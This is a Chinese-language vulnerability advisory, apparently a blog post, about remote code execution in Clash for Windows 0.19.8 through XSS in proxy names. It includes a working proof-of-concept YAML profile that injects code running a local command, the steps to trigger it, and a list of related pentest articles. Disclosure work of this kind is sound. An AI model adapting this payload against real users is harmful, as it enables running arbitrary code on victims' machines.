Clash_for_windows远程代码执行

简介: Clash_for_windows远程代码执行

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

crash_for_windows_pkg由 Electron 提供支持。如果 XSS 负载以代理的名义,我们可以远程执行受害者计算机上的任何 JavaScript 代码。

影响版本

0.19.8(0.19.9版本还有(mac目前没发现)

POC

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

漏洞利用

1、导入POC配置文件
2、切换到"Profiles"
3、单击“Proxies”即可触发

修复建议

作者已发布了修复版本,下载更新即可
[https://github.com/Fndroid/clash_for_windows_pkg/releases](

目录
相关文章
|
3月前
|
安全 Shell Linux
内网渗透测试基础——Windows PowerShell篇
内网渗透测试基础——Windows PowerShell篇
133 0
|
6月前
|
安全 Windows
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
132 2
|
8月前
|
数据安全/隐私保护 Windows
Windows卸载与清除工具 “ Geek 与 CCleaner ”
一、Geek的简介 1、大概介绍 geek是一款专业的Windows软件卸载软件,它可以卸载程序并查找以前卸载的应用程序在注册表中留下的点点滴滴,彻底地卸载干净,还用户一个干净整洁的电脑。 2、详细介绍 Geek Uninstaller - the best FREE uninstaller
343 1
|
安全 数据安全/隐私保护 Windows
001-windows无法远程(1)
windows无法远程,报错是:为安全考虑,已锁定该用户账户,原因是登录尝试或密码更改尝试过多,请稍后片刻再重试,或与系统管理员或技术支持联系
001-windows无法远程(1)
|
缓存 Shell C#
后渗透之windows中远程下载文件tips
后渗透之windows中远程下载文件tips
|
Windows
windows下常查看端口占用方法总结
启动Tomcat时又出现端口占用错误。现在把对端口的处理命令和方法进行汇总。     1.查看所有连接的PID           开始--运行--cmd  ,输入netstat -ano            找到端口号对应的PID后,从任务管理器中停止PID对应程序。
1154 1
|
安全 Windows
Windows新0day漏洞可穿透UAC
Sophos今天公布了一个新的Windows 0day漏洞,该漏洞允许应用程序提升权限到“系统”等级,从而绕过Vista和Windows 7的用户帐户控制(UAC)。 该漏洞发生于Win32k.sys中的一个错误,这是Windows内核的一部分,该缺陷关系到一个特定的注册表键值,可以使攻击者伪造系统账户,并无限制地访问所有的Windows组件,该安全漏洞似乎影响所有的Windows版本,但并不会允许远程执行代码。
995 0
|
安全 Windows Shell
DccwBypassUAC - Windows 8.1和10 UAC绕过dccw exe中的WinSxS
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396473 ...
1572 0

热门文章

最新文章